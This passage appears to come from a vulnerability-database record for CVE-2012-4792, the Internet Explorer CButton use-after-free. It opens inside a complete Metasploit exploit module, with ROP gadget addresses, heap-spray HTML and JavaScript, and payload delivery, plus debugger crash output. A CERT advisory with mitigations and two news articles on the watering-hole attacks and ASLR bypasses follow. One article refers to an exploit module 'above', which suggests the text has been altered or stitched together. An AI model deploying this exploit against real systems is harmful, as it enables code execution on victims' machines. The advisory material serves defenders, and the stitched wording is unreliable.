A\n use-after-free condition occurs when a CButton object is freed, but a reference\n is kept and used again during a page reload, an invalid memory that's controllable\n is used, and allows arbitrary code execution under the context of the user.\n\n Please note: This vulnerability has been exploited in the wild targeting\n mainly China/Taiwan/and US-based computers.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'eromang',\n 'mahmud ab rahman',\n 'juan vazquez', #Metasploit\n 'sinn3r', #Metasploit\n 'Peter Vreugdenhil' #New trigger & new exploit technique\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4792' ],\n [ 'OSVDB', '88774' ],\n [ 'US-CERT-VU', '154201' ],\n [ 'BID', '57070' ],\n [ 'MSB', 'MS13-008' ],\n [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\n [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],\n [ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Dec 27 2012\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n 
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\")[0].to_i\n end\n\n def nop\n return make_nops(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n # No rop. 
Just return the payload.\n return code if t['Rop'].nil?\n\n # Make post code execution more stable\n code << rand_text_alpha(12000)\n\n msvcrt_align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n java_align = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n\n rop_payload = ''\n\n case t['Rop']\n when :msvcrt\n case t.name\n when 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})\n when 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})\n end\n else\n rop_payload = generate_rop_payload('java', java_align + code)\n end\n\n rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n html = %Q|<!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n\n <script>\n #{js_mstime_malloc}\n\n\n function helloWorld() {\n e_form = document.getElementById(\"formelm\");\n e_div = document.getElementById(\"divelm\");\n\n for(i =0; i < 20; i++) {\n document.createElement('button');\n }\n e_div.appendChild(document.createElement('button'));\n e_div.firstChild.applyElement(e_form);\n\n e_div.innerHTML = \"\";\n 
e_div.appendChild(document.createElement('body'));\n\n CollectGarbage();\n\n p = unescape(\"#{padding}\");\n for (i=0; i < 3; i++) {\n p += unescape(\"#{padding}\");\n }\n p += unescape(\"#{js_payload}\");\n\n fo = unescape(\"#{align_esp}\");\n for (i=0; i < 55; i++) {\n if (i == 54) { fo += unescape(\"#{xchg_esp}\"); }\n else { fo += unescape(\"#{align_esp}\"); }\n }\n\n fo += p;\n\n mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:\"myanim\"});\n }\n </script>\n </head>\n\n <body onload=\"eval(helloWorld())\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n <div id=\"divelm\"></div>\n <form id=\"formelm\">\n </form>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n # Avoid the attack if no suitable target found\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n\n\n=begin\n(87c.f40): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nmshtml!CMarkup::OnLoadStatusDone+0x504:\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\n0:008> k\nChildEBP RetAddr\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\n020bfd58 6363c3c5 
mshtml!GlobalWndOnMethodCall+0xfb\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\n020bffec 00000000 kernel32!BaseThreadStart+0x37\n\n0:008> r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\nmshtml!CMarkup::OnLoadStatusDone+0x504:\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cbutton_uaf.rb"}], "cert": [{"lastseen": "2019-10-09T19:49:48", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the CButton object, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the mshtml CButton object. Specially-crafted JavaScript can cause Internet Explorer to free the CButton object without removing a pointer, resulting in a state where Internet Explorer may attempt to call an invalid memory address. This memory address may be under the control of the attacker.\n\nThis vulnerability is currently being exploited in the wild, using Adobe Flash to achieve a heap spray and Java to provide Return Oriented Programming (ROP) gadgets. Other proof-of-concept exploits are publicly available that do not use heap spraying. 
\n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page, an HTML email message or attachment, or a Microsoft Office document), an attacker may be able to execute arbitrary code with the privileges of the user running Internet Explorer. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nMicrosoft has released [MS13-008](<https://technet.microsoft.com/en-us/security/bulletin/ms13-008>) to address this vulnerability. Users should run Windows Update to receive the patch. If a user is unable to update, please consider the following workarounds; none of them is a substitute for the patch: \n \n--- \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will; the public exploit for this vulnerability targets those platforms with ROP gadgets taken from msvcrt.dll, which needs no ASLR bypass there. \n \n**Apply the Microsoft Fix It** \n \nMicrosoft has provided a \"Fix it\" patch that causes Internet Explorer to safely crash if an attempt is made to exploit this vulnerability, rather than resulting in code execution. Please see the [Microsoft SRD blog entry](<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx>) for more details. Treat the Fix it as a stopgap until MS13-008 is installed: Windows must be fully patched for it to be effective, and there is a published report that it [is insufficient](<http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/>) to completely address the vulnerability. \n \n**Disable the Flash ActiveX control in Internet Explorer** \n \nWhile it does not address the underlying vulnerability in Internet Explorer, disabling Flash may break some exploits (the in-the-wild exploit uses Flash for its heap spray). 
The Flash ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n\n\n`{D27CDB6E-AE6D-11cf-96B8-444553540000}`More information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n\n\n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{D27CDB6E-AE6D-11cf-96B8-444553540000}]` \n`\"Compatibility Flags\"=dword:00000400` \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{D27CDB6E-AE6D-11cf-96B8-444553540000}]` \n`\"Compatibility Flags\"=dword:00000400`**Disable Java in Internet Explorer** \n \nWhile it does not address the underlying vulnerability in Internet Explorer, disabling Java may break some exploits. Starting with Java 7 Update 10, it is possible to disable Java content in web browsers through the Java control panel applet. Please see the [Java documentation](<http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>) for more details. \n--- \n \n### Vendor Information\n\n**Javascript is disabled. Click here to view vendors.**\n\nNo information available at this time. 
\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.0 | E:H/RL:W/RC:UR \nEnvironmental | 9 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://technet.microsoft.com/en-us/security/bulletin/ms13-008>\n * <http://technet.microsoft.com/en-us/security/advisory/2794220>\n * <http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx>\n * <http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>\n * <http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/>\n * <http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/>\n * <http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/>\n * <http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html>\n * <http://labs.alienvault.com/labs/index.php/2012/just-another-water-hole-campaign-using-an-internet-explorer-0day>\n * <http://support.microsoft.com/kb/2458544>\n * <http://www.youtube.com/watch?v=28_LUs_g0u4>\n * <http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>\n\n### Acknowledgements\n\nThis vulnerability was described by Eric Romang and FireEye.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-4792](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) \n---|--- \n**Date Public:** | 2012-12-28 \n**Date First Published:** | 2012-12-29 \n**Date Last Updated: ** | 2013-01-14 21:59 UTC \n**Document Revision: ** | 42 \n", "modified": "2013-01-14T21:59:00", "published": "2012-12-29T00:00:00", "id": "VU:154201", "href": "https://www.kb.cert.org/vuls/id/154201", "type": "cert", "title": "Microsoft Internet 
Explorer CButton use-after-free vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:27", "bulletinFamily": "info", "description": "[](<http://4.bp.blogspot.com/-N6kVGzv51Vo/UOQmpOx7p0I/AAAAAAAAQ8s/GkB-QlW_qk8/s1600/CFR+watering+hole+attack+also+target+Capstone+Turbine+Corporation.png>)Last week the [Council on Foreign Relations website was compromised](<http://thehackernews.com/2012/12/chinese-hackers-exploiting-internet.html>) and used for a drive-by attack that exploited a zero-day Internet Explorer vulnerability (CVE-2012-4792; the in-the-wild exploit targeted IE 8) for cyber espionage, suspected to be the work of Chinese hackers. Microsoft later confirmed that [Internet Explorer 6, 7, and 8 are vulnerable](<http://thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html>) to remote code execution.\n\n \n\n\nAccording to researcher [Eric Romang](<http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/>), the CFR watering hole attack (CVE-2012-4969 and CVE-2012-4792) has also targeted the Capstone Turbine Corporation website since mid-September. He was able to find a [cached version of the first JavaScript](<http://pastebin.com/PuM8GMeb>) that starts the drive-by attack. A further Google dork search for **_site:capstoneturbine.com \u201c_include\u201d_** turns up a file strangely similar to the CFR.org \u201cnews_14242aa.html\u201d file.\n\n \n\n\nCapstone Turbine Corporation is the world\u2019s leading producer of low-emission microturbine systems, and was first to market with commercially viable microturbine energy products. 
Capstone Turbine has shipped thousands of Capstone MicroTurbine systems to customers worldwide.\n\n \n\n\nJindrich Kubec, director of Threat Intelligence at avast, [confirmed](<https://twitter.com/Jindroush/statuses/286268899010416640>) that the exploit was present on the Capstone Turbine Corporation site in September: \"_I wrote to Capstone Turbine on 19th Sep about the Flash exploit stuff they were hosting. They never replied. And also not fixed_\"\n\n \n\n\nEric shows many valid proofs from **_[urlQuery](<http://urlquery.net/report.php?id=551220>)_** and **_VirusTotal _**results that confirm the compromise of this new target, and he suggests, \"_Potentially the guys behind CVE-2012-4969 and CVE-2012-4792 are the same_.\"\n\n \n\n\nFortunately, Microsoft has released a fix, so the new year should get a safer start after all.\n", "modified": "2013-01-11T18:02:27", "published": "2013-01-02T01:23:00", "id": "THN:5ACF233F4E37E6A4975B246F2082107C", "href": "http://thehackernews.com/2013/01/cfr-watering-hole-attack-also-target.html", "type": "thn", "title": "CFR watering hole attack also target Capstone Turbine Corporation", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:14", "bulletinFamily": "info", "description": "[](<http://2.bp.blogspot.com/-w3LwCzj4YXo/Ul6znjNKKPI/AAAAAAAAYHo/lX4eIOqgbds/s1600/ASLR+bypass+techniques+are+popular+with+APT+attacks.jpg>)\n\n[Address space layout randomization (ASLR)](<http://thehackernews.com/search/label/ASLR>) is a security technique that helps protect against memory-corruption exploits such as buffer overflow attacks. Many recent [APT (Advanced Persistent Threat)](<http://thehackernews.com/search/label/APT>) attacks have utilized many different ASLR bypass techniques during the past year, according to researchers at [FireEye](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html>). 
\n \nMany exploits and malware attacks rely on the attacker's ability to accurately identify where specific processes or system functions reside in memory. In order to exploit or leverage a function, an attacker must first be able to tell their code where to find the function or process to exploit. The [goal of ASLR](<http://thehackernews.com/2012/07/android-security-shielded-with-full.html>) is to introduce randomness into the addresses used by a given task. It involves randomly arranging the positions of key data areas of a program, including the base of the executable and the positions of the stack, heap, and libraries, in a process's address space. \n\n \n\n\nToday much attention is focused on client-side exploits, especially inside [web browsers](<http://thehackernews.com/search/label/web%20browser>). Normally the exploitation is done through the oldest known method of spraying the heap. \n \nAccording to the researchers, the easiest and most popular way to defeat ASLR protection is loading a non-ASLR module. Such attacks were recently used in the [Internet Explorer](<http://thehackernews.com/search/label/Internet%20Explorer>) (IE) zero-day exploit CVE-2013-3893 and some other [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>), e.g. CVE-2013-1347, CVE-2012-4969 and CVE-2012-4792 (the public CVE-2012-4792 exploit module above does exactly this, building its ROP chain from msvcrt.dll on Windows XP/2003 and from a non-ASLR Java runtime library on Vista/7). \n \nBut there is a limitation: the non-ASLR module technique requires that IE 8 and IE 9 be running alongside old software such as JRE 1.6 or Office 2007/2010.\n\n \nAnother ASLR bypass technique involves the modification of the BSTR length/null terminator. But this technique only applies to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing/decreasing the content of a memory pointer. 
The Adobe XFA [0day exploit](<http://thehackernews.com/search/label/zero%20day>) (CVE-2013-0640) uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and [DEP](<http://thehackernews.com/search/label/DEP>). \n \n\"_The good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR such that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it may then use the same memory corruption bug to control EIP._\" \n \nAccording to Microsoft, these types of bugs typically use [JavaScript](<http://thehackernews.com/search/label/JavaScript%20code>) to trigger the flaw, as well as heap-spray to abuse the memory, and bypass ASLR. ASLR bypassing has become more and more common in Zero-Day attacks.\n", "modified": "2013-10-16T15:45:43", "published": "2013-10-16T04:42:00", "id": "THN:7ACF921BA3C582C8760C348FD2475BC2", "href": "http://thehackernews.com/2013/10/aslr-bypass-techniques-are-popular-with.html", "type": "thn", "title": "ASLR bypass techniques are popular with APT attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}